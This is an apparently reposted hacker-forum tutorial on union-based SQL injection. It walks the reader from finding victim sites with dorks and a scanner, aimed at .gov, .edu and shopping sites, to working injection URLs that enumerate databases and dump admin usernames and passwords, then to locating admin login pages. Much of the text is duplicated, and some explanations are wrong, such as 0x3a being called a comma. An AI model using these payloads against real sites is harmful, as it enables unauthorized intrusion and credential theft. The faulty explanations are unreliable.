By reading this tutorial you agree that:
The author is not responsible in anyway for you actions done by the use of this tutorial.
The tutorial is for educational purposes only and for no site harm.
If posting this tutorial somewhere else give credits to the author uRBAN dAMAGE.
The author is not responsible in anyway for you actions done by the use of this tutorial.
The tutorial is for educational purposes only and for no site harm.
If posting this tutorial somewhere else give credits to the author uRBAN dAMAGE.
Step №1
Finding a vulnerable site
There are many ways to find a vulnerable website. I will show you a fast method and a slow manually done method, just so you know what actually is done by doing the fast method. Both methods are accurate.
Method №1
This is the slow manual method. For here you will need a list of dorks and Google.
Here is a list of dorks: Link
Once you have it downloaded choose one dork from the list and continue reading.
I will be using the dork "show.php?id=". Once you chose yours go on google and type it in and hit Enter.
Method №2
My favorite way.
Go to This website.
Type your dork in the textbox, choose "Bing", not "Google"!!!
Make sure you check "Depth scan ( slow but sure )".
Hit enter and the sites which you see with a @ id at the end of the URL are vulnerable.
Also they become whiter then the others.
Method №3
Download KORRUPT scanner from here: Link
Just click on the EXE picture. I guarantee that it is not infected.
How to use:
1. Enter the path to your dorklist, E.g. "C:\dorks.txt".
2. Enter a domain to search, for example ".co.uk", ".nl", ".gov", ".edu", etc. (blank if any).
3. Enter a keyword for example "shop", "paypal", "xbox", etc. (blank if any).
4. Set the timeout to something reasonable, ~5000 (= 5 seconds) is efficient, something too low will be fast however will not bring back good results.
5. The yellow writing appearing are the crawled links.
6. Red writing showing as scanning are the invulnerable links, green are vulnerable.
7. All vulnerable links are stored in the Application Path.
Credits for the program and "How to use" go to kript0x
==
Step №2
Finding if website is vulnerable or not manually.
Let's say you got your website from the first method I explained above and you want to check if it is vulnerable or not.
What you have to do is put a simple " ' " in front of the sites url.
E.g: http://www.yoursite.com/show.php?id=12'
If it shows some kind of error somewhere in the site like this one "
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1", then the site you chose is vulnerable. This is also how the automatic scanner from method number 2 works.
Remember the error will not be the same always it can be different everytime!
==
Step №3
Injecting...
From here on you will start learning about the codes which you need to successfully inject a website and get the admin login details and admin page of the targeted site.
How sites work: Site->Database->Tables->Columns->Data
Code №1
Finding Columns
Now once you know that your targeted site is vulnerable to SQL Injection, you have to find the number of columns the Database has.
The code we will be using to find out this will be this:
Finding a vulnerable site
There are many ways to find a vulnerable website. I will show you a fast method and a slow manually done method, just so you know what actually is done by doing the fast method. Both methods are accurate.
Method №1
This is the slow manual method. For here you will need a list of dorks and Google.
Here is a list of dorks: Link
Once you have it downloaded choose one dork from the list and continue reading.
I will be using the dork "show.php?id=". Once you chose yours go on google and type it in and hit Enter.
Method №2
My favorite way.
Go to This website.
Type your dork in the textbox, choose "Bing", not "Google"!!!
Make sure you check "Depth scan ( slow but sure )".
Hit enter and the sites which you see with a @ id at the end of the URL are vulnerable.
Also they become whiter then the others.
Method №3
Download KORRUPT scanner from here: Link
Just click on the EXE picture. I guarantee that it is not infected.
How to use:
1. Enter the path to your dorklist, E.g. "C:\dorks.txt".
2. Enter a domain to search, for example ".co.uk", ".nl", ".gov", ".edu", etc. (blank if any).
3. Enter a keyword for example "shop", "paypal", "xbox", etc. (blank if any).
4. Set the timeout to something reasonable, ~5000 (= 5 seconds) is efficient, something too low will be fast however will not bring back good results.
5. The yellow writing appearing are the crawled links.
6. Red writing showing as scanning are the invulnerable links, green are vulnerable.
7. All vulnerable links are stored in the Application Path.
Credits for the program and "How to use" go to kript0x
==
Step №2
Finding if website is vulnerable or not manually.
Let's say you got your website from the first method I explained above and you want to check if it is vulnerable or not.
What you have to do is put a simple " ' " in front of the sites url.
E.g: http://www.yoursite.com/show.php?id=12'
If it shows some kind of error somewhere in the site like this one "
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1", then the site you chose is vulnerable. This is also how the automatic scanner from method number 2 works.
Remember the error will not be the same always it can be different everytime!
==
Step №3
Injecting...
From here on you will start learning about the codes which you need to successfully inject a website and get the admin login details and admin page of the targeted site.
How sites work: Site->Database->Tables->Columns->Data
Code №1
Finding Columns
Now once you know that your targeted site is vulnerable to SQL Injection, you have to find the number of columns the Database has.
The code we will be using to find out this will be this:
Code: |
http://www.yoursite.com/show.php?id=12 order by 10 |
Now let me explain this bit of code.
Errors might look like this one: "Unknown column '123985' in 'order clause'" It might be different aswell!
Simply the order by command counts the numbers of columns in the sites database.
The number in front of "orderby" is the number of the columns in the database. This means that if you write a number higher then the columns in the sites database then it will show you an error. The hint is to find the number before which you get an error. So now I type "order by 10" and I don't get an error, that means I have to go higher. I type "order by 11" and I get an error, that means that we have 10 columns in the database since we got an error on the 11th and not on the 10th.
Now we go to -->
Code №2
Finding Vulnerable Columns
Now we know how to find the number of the columns, but we don't know how to find which ones of them are vulnerable. Let me show you the code and then explain.
Code: |
http://www.yoursite.com/show.php?id=-12 union all select 1,2,3,4,5,6,7,8,9,10-- |
Do not forget the " - " in front of the number of the site in this case 12. Remember the number might be always different then the one in the tutorial.
From our example above we have 10 columns in the sites database, that is why we write every single one of them separated with commas.
The command "union all select" select all of the columns and shows which are the vulnerable in the site.
When you type that command you will see some bits of the page disappear and you will see some random numbers from 1 to 11 in its place.
It will look like this:
Spoiler: |
So the vulnerable columns will be showed like that and in our case it is 1. You can inject using this vulnerable column.
Now we go to-->
Code №3
Finding SQL Version
Now to find the SQL version you need to type in this code.
Code: |
http://www.yoursite.com/show.php?id=-12 union all select @@version,2,3,4,5,6,7,8,9,10-- |
Now simply the "@@version" string which replaced the vulnerable column 1 will give you the version of the SQL on the number 1's place.
If your targeted site is a version lower then 5 then just go on it's hard to inject sites like that it's not for beginners.
Now we go to-->
Code №4
Finding Database Names
A site can have from 1 database to more then you can count. But they're usually counted only on your fingers.
You will need those database names if you can't find the admin data, tables and columns in the default database which every SQL Injection vulnerable site has except the ones which are lower from version 5.
The code:
Code: |
http://www.yoursite.com/show.php?id=-12 union all select group_concat(schema_name),2,3,4,5,6,7,8,9,10 from information_schema.schemata-- |
This code means that it will take all the database names from the site.
Now if you can't find the admin table and columns with the default SQL "information_schema" database then you have to type this in front of all the other code
Code: |
where table_schema=database(0xHEX) |
This code. It means that it will extract the wanted data from the database specified. =The "(0xHEX)" is the name of the database on the place of "HEX" you have to put the hex value of the database name. You can convert that in here: http://www.swingnote.com/tools/texttohex.php
The "0x" means "Execute". Extract data from that database...
Now we go to-->
Code №5
Finding Table Names
Now you will need to code for finding the table names. You need the table names to find the table in which are the admin data columns. This means that you need to find the table with E.g name "admin_table" and this table will contain the column names E.g "admin_user" & "admin_pass", from which you will retrieve the same info.
The code is:
Code: |
http://www.yoursite.com/show.php?id=-12 union all select group_concat(table_name),2,3,4,5,6,7,8,9,10 from information_schema.tables-- |
Now to explain this bit of code. "group_concat(table_name)" in the place of the vulnerable column number 1 means that it will take all of the table names and list them in the vulnerable column number 1 space.
Next bit of code "from information_schema.tables" means that it will take the table names from the database named "information_schema".
The whole one will mean
http://www.yoursite.com/show.php?id=-12 union all list_all_table_names,2,3,4,5,6,7,8,9,10 from database_named_"information_schema".location_tables--
Now lets say we found the table name "admin_tbl".
Now we go to-->
Code №6
Finding Column Names
Now to find the column names for the admin data which are in the table we found earlier.
Code:
Code: |
http://www.yoursite.com/show.php?id=-12 union all select group_concat(column_name),2,3,4,5,6,7,8,9,10 from information_schema.columns-- |
This bit of code is absolutely the same as the one above just the difference is that you will have to change "table" with "column".
It is explained the same way, get column names from database inf_schema.loc_columns...
Sometimes you have to put this in the end of the code "where table_schema=database()" if you can't find the columns name. This bit of code actually means that it will look only in the database you gave it to look into.
Now lets say we found the names of the columns we found are "admin_user" & "admin_pass".
Now we go to-->
Code №7
Finding Admin Login Details
Now to find the data or admin login details, you have to use this code.
Code: |
http://www.yoursite.com/show.php?id=-12 union all select group_concat(admin_user,0x3a,admin_pass),2,3,4,5,6,7,8,9,10 from admin_tbl-- |
To explain this code.
So the group_concat(admin_user,0x3a,admin_pass) from admin_tbl means "Get the information from admin_user and admin_pass column" from the admin_data_table_"admin_tbl"".
Now the "0x3a" between the two columns is a comma in ascii characters. Simply this code gets the admin acc and pass and separates them with a comma on the vulnerable column number 1.
Code №8
Finding Admin Login Page
Actually this here is not a code but just a site which will help you find the admin pages.
http://sc0rpion.ir/af/
Go here post your vulnerable site without the dork at the end not like that: http://www.yoursite.com/news.php?id=12
but
http://www.yoursite.com/
F.A.Q
PS: |
Question: This method doesn't work. Why? Answer: Because there are more methods for SQL Injection it is not only the basic one. Some of the others are Blind SQL Injection, Error based SQL Injection and more search HF for tutorials on those. Also possible WAF - Web Application Firewall which filters certain codes/words and you can't inject with them. |
Credit to : uRBAN dAMAGE
Tidak ada komentar:
Posting Komentar